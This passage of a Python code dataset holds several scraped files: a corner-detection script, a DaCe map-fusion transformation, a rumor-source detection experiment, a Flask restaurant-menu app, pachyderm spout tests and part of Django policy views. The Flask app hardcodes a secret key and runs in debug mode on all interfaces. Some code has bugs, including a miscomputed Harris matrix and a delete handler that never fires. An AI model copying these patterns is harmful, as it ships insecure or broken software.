"usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 168, "usage_type": "call"}, {"api_name": "tkinter.Scale", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tkinter.Radiobutton", "line_number": 179, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 184, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 202, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "187905412", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n# import util\nimport numpy as np\n\ndef convolve(image,kernel):\n return np.sum(np.multiply(image,kernel))\ndef corners():\n img=np.array(mpimg.imread('1.png'))\n print(img)\n rows = 50\n columns = 50\n Sx = np.zeros((rows,columns))\n Sy = np.zeros((rows,columns))\n Gx = np.array([np.array([-1,0,1]),np.array([-2,0,2]),np.array([-1,0,1])])\n Gy = np.array([np.array([-1,-2,-1]),np.array([0,0,0]),np.array([1,2,1])])\n\n for i in range(rows-2):\n for j in range(columns-2):\n Sx[i+1][j+1] = convolve(Gx,img[i:i+3,j:j+3])\n Sy[i+1][j+1] = convolve(Gy,img[i:i+3,j:j+3])\n Sx2 = np.multiply(Sx,Sx)\n Sxy = np.multiply(Sx,Sy)\n Sy2 = np.multiply(Sy,Sy)\n R = np.zeros((rows,columns))\n for i in range(rows):\n for j in range(columns):\n # print(\"Sx2[i,j],Sxy[i,j],Sxy[i,j],Sy2[i,j]\", Sx2[i,j],Sxy[i,j],Sxy[i,j],Sy2[i,j])\n H = np.array([np.array([Sx2[i,j],Sxy[i,j]]),np.array([Sx2[i,j],Sxy[i,j]])])\n d = np.linalg.det(H)\n k = 0.04\n t = H[0][0]+H[1][1]\n R[i,j] = abs(d) - k*(t**2)\n # print(\"d \",d,\" i \", i ,\" j \", j ,\" R[i,j] \", R[i,j])\n\n SS = np.sqrt(Sx2 + Sy2)\n for i in range(rows):\n for j in range(columns):\n print(\"i \",i,\"j \",j,\"SS[i][j] \",SS[i][j],\"Sx[i][j] \",Sx[i][j],\"Sy[i][j] \",Sy[i][j])\n plt.imshow(SS)\n plt.show()\n\n# def enhancedFeatureExtractorDigit(datum):\n# \"\"\"\n# Your feature extraction playground.\n\n# You should return a util.Counter() of features\n# for this datum (a unit of data)\n\n# ## DESCRIBE YOUR ENHANCED FEATURES HERE...\n \n# ##\n# \"\"\"\n\n# def getPixelVal(x, y):\n# \"\"\"\n# Helper Function to return the pixel value at location x, y\n# 1 : black\n# 0 : white\n# Refer to the basicFeatureExtractorDigit function for more Details\n# \"\"\"\n# return datum[x * DATUM_HEIGHT + y]\n\n# features = util.Counter()\n\n# # \"*** YOUR CODE HERE ***\"\n\n\n# # util.raiseNotDefined()\n\n# return features", "sub_path": "Lab1/classification/corners.py", "file_name": "corners.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sum", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "645711555", "text": "# Copyright 2019-2022 ETH Zurich and the DaCe authors. All rights reserved.\n\"\"\"\nThis module contains classes that implement subgraph fusion using on-the-fly recomputation\n\"\"\"\nimport dace\n\nfrom dace.transformation import transformation\nfrom dace.properties import make_properties, Property\nfrom dace.transformation.subgraph import helpers\n\nfrom collections import OrderedDict\n\nfrom dace.transformation.subgraph import OnTheFlyMapFusion\n\n\n@make_properties\nclass SubgraphOTFFusion(transformation.SubgraphTransformation):\n def can_be_applied(self, *args, **kwargs) -> bool:\n return True\n\n def apply(self, state: dace.SDFGState, sdfg: dace.SDFG):\n state_subgraph = dace.sdfg.state.StateSubgraphView(state, map(state.node, self.subgraph))\n map_entries = helpers.get_outermost_scope_maps(sdfg, state, state_subgraph)\n children_dict, parent_dict = self.topology(state, map_entries)\n\n fuse_counter = 0\n queue = [me for me in map_entries if me not in children_dict]\n while len(queue) > 0:\n child = queue.pop(0)\n if child not in parent_dict:\n continue\n\n parents = parent_dict[child]\n while len(parents) > 0:\n parent = parents.pop(0)\n fusion = OnTheFlyMapFusion(state, sdfg_id=sdfg.sdfg_id, state_id=sdfg.node_id(state))\n if fusion.can_be_applied(state, sdfg, parent, child):\n fusion.apply(state, sdfg, parent, child)\n fuse_counter += 1\n break\n else:\n queue.append(parent)\n\n queue.extend(parents)\n\n subgraph = []\n for node_id in self.subgraph:\n try:\n state.node(node_id)\n subgraph.append(node_id)\n except:\n pass\n\n self.subgraph = subgraph\n state_subgraph = dace.sdfg.state.StateSubgraphView(state, map(state.node, self.subgraph))\n map_entries = helpers.get_outermost_scope_maps(sdfg, state, state_subgraph)\n children_dict, parent_dict = self.topology(state, map_entries)\n\n return fuse_counter\n\n def topology(self, state, map_entries):\n children_dict = OrderedDict()\n parent_dict = OrderedDict()\n for map_entry in map_entries:\n map_exit = state.exit_node(map_entry)\n for e in state.out_edges(map_exit):\n if isinstance(e.dst, dace.nodes.AccessNode):\n for oe in state.out_edges(e.dst):\n if oe.dst in map_entries:\n other_entry = oe.dst\n\n if map_entry not in children_dict:\n children_dict[map_entry] = []\n children_dict[map_entry].append(other_entry)\n\n if other_entry not in parent_dict:\n parent_dict[other_entry] = []\n\n parent_dict[other_entry].append(map_entry)\n\n return children_dict, parent_dict\n", "sub_path": "dace/transformation/subgraph/map_fusion.py", "file_name": "map_fusion.py", "file_ext": "py", "file_size_in_byte": 3111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "dace.transformation.transformation.SubgraphTransformation", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dace.transformation.transformation", "line_number": 17, "usage_type": "name"}, {"api_name": "dace.SDFGState", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dace.SDFG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dace.sdfg.state.StateSubgraphView", "line_number": 22, "usage_type": "call"}, {"api_name": "dace.sdfg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "dace.transformation.subgraph.helpers.get_outermost_scope_maps", "line_number": 23, "usage_type": "call"}, {"api_name": "dace.transformation.subgraph.helpers", "line_number": 23, "usage_type": "name"}, {"api_name": "dace.transformation.subgraph.OnTheFlyMapFusion", "line_number": 36, "usage_type": "call"}, {"api_name": "dace.sdfg.state.StateSubgraphView", "line_number": 55, "usage_type": "call"}, {"api_name": "dace.sdfg", "line_number": 55, "usage_type": "attribute"}, {"api_name": "dace.transformation.subgraph.helpers.get_outermost_scope_maps", "line_number": 56, "usage_type": "call"}, {"api_name": "dace.transformation.subgraph.helpers", "line_number": 56, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 63, "usage_type": "call"}, {"api_name": "dace.nodes", "line_number": 67, "usage_type": "attribute"}, {"api_name": "dace.properties.make_properties", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "224911533", "text": "import os\nimport random\nimport sys\nimport time\nfrom sys import platform as _platform\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport scipy.io as io\nfrom tqdm import tqdm\n\nimport estimation\nimport utilities\n\n\n# Detect source from a diffusion graph\ndef detect_source(source, adjacency, who_infected):\n\n # Jordan-centrality estimate\n jordan_estimate = estimation.jordan_centrality(who_infected)\n jordan_dist = estimation.get_estimate_dist(source, jordan_estimate, adjacency)\n\n # Rumor centrality estimate\n rumor_estimate = estimation.rumor_centrality(who_infected)\n rumor_dist = estimation.get_estimate_dist(source, rumor_estimate, adjacency)\n\n # ML estimate\n ml_estimate, _ = estimation.max_likelihood(who_infected, adjacency)\n ml_dist = estimation.get_estimate_dist(source, ml_estimate, adjacency)\n\n results = (jordan_dist, rumor_dist, ml_dist)\n # results = (jordan_estimate, rumor_estimate, ml_estimate)\n return results\n\ndef compute_distance(source, node, graph):\n ctg_path = nx.astar_path(graph, source, node)\n dis = len(ctg_path) - 1\n return dis\n\nif __name__ == \"__main__\":\n\n result_path = \"results/\"\n data_path = \"../source_tracer/data/\"\n \n start = time.clock()\n names = ['tvshow', 'as', 'fb', 'politician', 'gov']\n for graph_name in names:\n print(\"Graph:\", graph_name)\n jordan_distances, rumor_distances, ml_distances = [], [], []\n gf = utilities.graphFetcher(graph_name=graph_name, data_path=data_path, flag='test', size=(20, 10000))\n\n pbar = tqdm(range(len(gf)))\n for _ in pbar:\n g, info = next(gf)\n adjacency, who_infected, source = utilities.build_adjacency(g, info)\n results = detect_source(source, adjacency, who_infected)\n j, r, m = results\n jordan_distances.append(j)\n rumor_distances.append(r)\n ml_distances.append(m)\n pbar.set_description('jordan error %d rumor error %d ml error %d' % (j, r, m))\n print(\"jordan avg error: %.2f\" % np.mean(jordan_distances))\n print(\"rumor avg error: %.2f\" % np.mean(rumor_distances))\n print(\"ml avg error: %.2f\" % np.mean(ml_distances))\n\n path = os.path.join(result_path, graph_name)\n assert(utilities.check_path(path))\n np.save(os.path.join(path, \"jordan_results.npy\"), jordan_distances)\n np.save(os.path.join(path, \"rumor_results.npy\"), rumor_distances)\n np.save(os.path.join(path, \"ml_results.npy\"), ml_distances)\n print(\"Experiment took %.3f seconds.\" % (time.clock() - start))", "sub_path": "python/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "estimation.jordan_centrality", "line_number": 21, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 22, "usage_type": "call"}, {"api_name": "estimation.rumor_centrality", "line_number": 25, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 26, "usage_type": "call"}, {"api_name": "estimation.max_likelihood", "line_number": 29, "usage_type": "call"}, {"api_name": "estimation.get_estimate_dist", "line_number": 30, "usage_type": "call"}, {"api_name": "networkx.astar_path", "line_number": 37, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 46, "usage_type": "call"}, {"api_name": "utilities.graphFetcher", "line_number": 51, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 53, "usage_type": "call"}, {"api_name": "utilities.build_adjacency", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "utilities.check_path", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "time.clock", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "18183219", "text": "from flask import Flask, render_template, request, redirect, url_for, flash,jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom setup_db import Base, Restaurant, MenuItem\nengine= create_engine(\"sqlite:///restaurantmenu.db\")\nBase.metadata.bind=engine\nDBSession= sessionmaker(bind=engine)\nsession= DBSession()\napp = Flask(__name__)\n\n# @app.route(\"/\")\n@app.route(\"/restaurants//menu/json/\")\ndef jsonifyMenuItems(restaurant_id):\n restaurant= session.query(Restaurant).filter_by(id=restaurant_id).one()\n items=session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return jsonify(MenuItem=[item.serialize for item in items])\n\n# ADD JSON ENDPOINT HERE\n@app.route(\"/restaurants//menu/json//\")\ndef menuItemJSON(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id=menu_id).one()\n return jsonify(MenuItem=menuItem.serialize)\n\n\n@app.route('/')\n@app.route(\"/restaurants//\")\ndef restaurant_menue(restaurant_id):\n restaurant= session.query(Restaurant).filter_by(id=restaurant_id).one()\n items=session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return render_template(\"menu.html\", items=items, restaurant=restaurant)\n\n\n# @app.route(\"/\")\n@app.route(\"/restaurants//new/\", methods=['GET','POST'])\ndef newMenuItem(restaurant_id):\n # return \"page to create a new menu item. Task 1 complete!\"\n if request.method==\"POST\":\n newItem= MenuItem(name= request.form['name'], description= request.form['description'],\n price= request.form['price'], restaurant_id=restaurant_id)\n session.add(newItem)\n session.commit()\n flash(\"new menu item is created\")\n return redirect(url_for('restaurant_menue', restaurant_id=restaurant_id))\n else:\n return render_template('newitemMenu.html', restaurant_id=restaurant_id)\n\n\n\n\n# Task 2: Create route for editMenuItem function here\n\n# @app.route(\"/\")\n@app.route('/restaurants///edit/',methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n edittedItem= session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method==\"POST\":\n if request.form['name']:\n edittedItem.name=request.form['name']\n if request.form['price']:\n edittedItem.price=request.form['price']\n if request.form['description']:\n edittedItem.description=request.form['description']\n if request.form['course']:\n edittedItem.course=request.form['course']\n session.add(edittedItem)\n session.commit()\n flash(\"menu items are editted\")\n return redirect(url_for('restaurant_menue', restaurant_id=restaurant_id))\n else:\n return render_template(\"editMenu.html\",\n restaurant_id=restaurant_id,\n menu_id=menu_id,\n item=edittedItem)\n\n\n# @app.route(\"/\")\n@app.route(\"/restaurants///delete/\", methods=['GET','POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n itemDeleted= session.query(MenuItem).filter_by(id=menu_id).one()\n if request.form==\"POST\":\n session.delete(itemDeleted)\n session.commit()\n flash(\"menu item is deleted\")\n return redirect(url_for(\"restaurant_menue\", restaurant_id=restaurant_id))\n return render_template('deleteMenuItem.html',item=itemDeleted)\n\n\n\n\n\nif __name__ == \"__main__\":\n app.secret_key=\"super secret key\"\n app.debug=True\n app.run(\"0.0.0.0\", 8000)\n", "sub_path": "full_stack_project/flask_project/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 5, "usage_type": "call"}, {"api_name": "setup_db.Base.metadata", "line_number": 6, "usage_type": "attribute"}, {"api_name": "setup_db.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "setup_db.Restaurant", "line_number": 14, "usage_type": "argument"}, {"api_name": "setup_db.MenuItem", "line_number": 15, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 16, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 21, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": "setup_db.Restaurant", "line_number": 28, "usage_type": "argument"}, {"api_name": "setup_db.MenuItem", "line_number": 29, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "setup_db.MenuItem", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 55, "usage_type": "argument"}, {"api_name": "flask.request.method", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "setup_db.MenuItem", "line_number": 79, "usage_type": "argument"}, {"api_name": "flask.request.form", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "652074738", "text": "#!/usr/bin/env python\n\n\"\"\"Tests of spout managers.\"\"\"\n\nimport tempfile\n\nimport pytest\nimport python_pachyderm\nimport tarfile\nfrom os.path import join\n\n\ndef test_spout_manager():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n # Validate output\n with tarfile.open(join(d, \"out\"), \"r:\") as t:\n with t.extractfile(\"foo1.txt\") as x:\n assert x.read() == b\"bar1\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker1\"\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo2.txt\", b\"bar2\")\n commit.put_marker_from_bytes(b\"marker2\")\n\n # Validate output (note that because the most recent writes simply\n # appended to the existing tar file, we must set ignore_zeros to ignore\n # the extra padding before the second set of tar headers)\n with tarfile.open(join(d, \"out\"), \"r:\", ignore_zeros=True) as t:\n with t.extractfile(\"foo2.txt\") as x:\n assert x.read() == b\"bar2\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker2\"\n\n\ndef test_spout_manager_nested_commits():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n with pytest.raises(Exception):\n with manager.commit() as commit:\n pass\n\n\ndef test_spout_manager_commit_state():\n with tempfile.TemporaryDirectory(suffix=\"pachyderm\") as d:\n manager = python_pachyderm.SpoutManager(\n pfs_directory=d, marker_filename=\"marker\"\n )\n\n for _ in range(3):\n with pytest.raises(Exception):\n with manager.commit() as commit:\n raise Exception()\n assert not manager._has_open_commit\n\n # Now try to use the spout manager normally & confirm it still works\n with manager.commit() as commit:\n commit.put_file_from_bytes(\"foo1.txt\", b\"bar1\")\n commit.put_marker_from_bytes(b\"marker1\")\n\n # Validate output. See note above re:ignore_zeros\n with tarfile.open(join(d, \"out\"), \"r:\", ignore_zeros=True) as t:\n with t.extractfile(\"foo1.txt\") as x:\n assert x.read() == b\"bar1\"\n with t.extractfile(\"marker\") as x:\n assert x.read() == b\"marker1\"\n", "sub_path": "tests/test_spout.py", "file_name": "test_spout.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tempfile.TemporaryDirectory", "line_number": 14, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 15, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 45, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 54, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 60, "usage_type": "call"}, {"api_name": "python_pachyderm.SpoutManager", "line_number": 61, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 66, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "389915310", "text": "from django.shortcuts import get_object_or_404\r\n\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom rest_framework import status\r\n\r\nfrom .models import Policy\r\nfrom agents.models import Agent\r\nfrom clients.models import Client, Site\r\nfrom checks.models import Check\r\nfrom autotasks.models import AutomatedTask\r\nfrom winupdate.models import WinUpdatePolicy\r\n\r\nfrom clients.serializers import ClientSerializer, SiteSerializer\r\nfrom agents.serializers import AgentHostnameSerializer\r\nfrom winupdate.serializers import WinUpdatePolicySerializer\r\n\r\nfrom .serializers import (\r\n PolicySerializer,\r\n PolicyTableSerializer,\r\n PolicyOverviewSerializer,\r\n PolicyCheckStatusSerializer,\r\n PolicyCheckSerializer,\r\n PolicyTaskStatusSerializer,\r\n AutoTaskPolicySerializer,\r\n RelatedClientPolicySerializer,\r\n RelatedSitePolicySerializer,\r\n RelatedAgentPolicySerializer,\r\n)\r\n\r\nfrom .tasks import (\r\n generate_agent_checks_from_policies_task,\r\n generate_agent_checks_by_location_task,\r\n generate_agent_tasks_from_policies_task,\r\n run_win_policy_autotask_task,\r\n)\r\n\r\n\r\nclass GetAddPolicies(APIView):\r\n def get(self, request):\r\n policies = Policy.objects.all()\r\n\r\n return Response(PolicyTableSerializer(policies, many=True).data)\r\n\r\n def post(self, request):\r\n serializer = PolicySerializer(data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n policy = serializer.save()\r\n\r\n # copy checks and tasks from specified policy\r\n if \"copyId\" in request.data:\r\n copyPolicy = Policy.objects.get(pk=request.data[\"copyId\"])\r\n\r\n checks = copyPolicy.policychecks.all()\r\n for check in checks:\r\n check.create_policy_check(policy=policy)\r\n\r\n tasks = copyPolicy.autotasks.all()\r\n\r\n for task in tasks:\r\n task.create_policy_task(policy=policy)\r\n\r\n return Response(\"ok\")\r\n\r\n\r\nclass GetUpdateDeletePolicy(APIView):\r\n def get(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n return Response(PolicySerializer(policy).data)\r\n\r\n def put(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n old_active = policy.active\r\n old_enforced = policy.enforced\r\n\r\n serializer = PolicySerializer(instance=policy, data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n saved_policy = serializer.save()\r\n\r\n # Generate agent checks only if active and enforced were changed\r\n if saved_policy.active != old_active or saved_policy.enforced != old_enforced:\r\n generate_agent_checks_from_policies_task.delay(\r\n policypk=policy.pk,\r\n create_tasks=(saved_policy.active != old_active),\r\n )\r\n\r\n return Response(\"ok\")\r\n\r\n def delete(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n\r\n # delete all managed policy checks off of agents\r\n generate_agent_checks_from_policies_task.delay(policypk=policy.pk)\r\n generate_agent_tasks_from_policies_task.delay(policypk=policy.pk)\r\n policy.delete()\r\n\r\n return Response(\"ok\")\r\n\r\n\r\nclass PolicyAutoTask(APIView):\r\n\r\n # tasks associated with policy\r\n def get(self, request, pk):\r\n policy = get_object_or_404(Policy, pk=pk)\r\n return Response(AutoTaskPolicySerializer(policy).data)\r\n\r\n # get status of all tasks\r\n def patch(self, request, task):\r\n tasks = AutomatedTask.objects.filter(parent_task=task)\r\n return Response(PolicyTaskStatusSerializer(tasks, many=True).data)\r\n\r\n # bulk run win tasks associated with policy\r\n def put(self, request, task):\r\n tasks = AutomatedTask.objects.filter(parent_task=task)\r\n run_win_policy_autotask_task.delay([task.id for task in tasks])\r\n return Response(\"Affected agent tasks will run shortly\")\r\n\r\n\r\nclass PolicyCheck(APIView):\r\n def get(self, request, pk):\r\n checks = Check.objects.filter(policy__pk=pk, agent=None)\r\n return Response(PolicyCheckSerializer(checks, many=True).data)\r\n\r\n def patch(self, request, check):\r\n checks = Check.objects.filter(parent_check=check)\r\n return Response(PolicyCheckStatusSerializer(checks, many=True).data)\r\n\r\n\r\nclass OverviewPolicy(APIView):\r\n def get(self, request):\r\n\r\n clients = Client.objects.all()\r\n return Response(PolicyOverviewSerializer(clients, many=True).data)\r\n\r\n\r\nclass GetRelated(APIView):\r\n def get(self, request, pk):\r\n\r\n response = {}\r\n\r\n policy = (\r\n Policy.objects.filter(pk=pk)\r\n .prefetch_related(\r\n \"workstation_clients\",\r\n \"workstation_sites\",\r\n \"server_clients\",\r\n \"server_sites\",\r\n )\r\n .first()\r\n )\r\n\r\n response[\"default_server_policy\"] = policy.is_default_server_policy\r\n response[\"default_workstation_policy\"] = policy.is_default_workstation_policy\r\n\r\n response[\"server_clients\"] = ClientSerializer(\r\n policy.server_clients.all(), many=True\r\n ).data\r\n response[\"workstation_clients\"] = ClientSerializer(\r\n policy.workstation_clients.all(), many=True\r\n ).data\r\n\r\n filtered_server_sites = list()\r\n filtered_workstation_sites = list()\r\n\r\n for client in policy.server_clients.all():\r\n for site in client.sites.all():\r\n if site not in policy.server_sites.all():\r\n filtered_server_sites.append(site)\r\n\r\n response[\"server_sites\"] = SiteSerializer(\r\n filtered_server_sites + list(policy.server_sites.all()), many=True\r\n ).data\r\n\r\n for client in policy.workstation_clients.all():\r\n for site in client.sites.all():\r\n if site not in policy.workstation_sites.all():\r\n filtered_workstation_sites.append(site)\r\n\r\n response[\"workstation_sites\"] = SiteSerializer(\r\n filtered_workstation_sites + list(policy.workstation_sites.all()), many=True\r\n ).data\r\n\r\n response[\"agents\"] = AgentHostnameSerializer(\r\n policy.related_agents(),\r\n many=True,\r\n ).data\r\n\r\n return Response(response)\r\n\r\n # update agents, clients, sites to policy\r\n def post(self, request):\r\n\r\n related_type = request.data[\"type\"]\r\n pk = request.data[\"pk\"]\r\n\r\n # workstation policy is set\r\n if (\r\n \"workstation_policy\" in request.data\r\n and request.data[\"workstation_policy\"] != 0\r\n ):\r\n policy = get_object_or_404(Policy, pk=request.data[\"workstation_policy\"])\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check and see if workstation policy changed and regenerate policies\r\n if (\r\n not client.workstation_policy\r\n or client.workstation_policy\r\n and client.workstation_policy.pk != policy.pk\r\n ):\r\n client.workstation_policy = policy\r\n client.save()\r\n\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"workstation\",\r\n 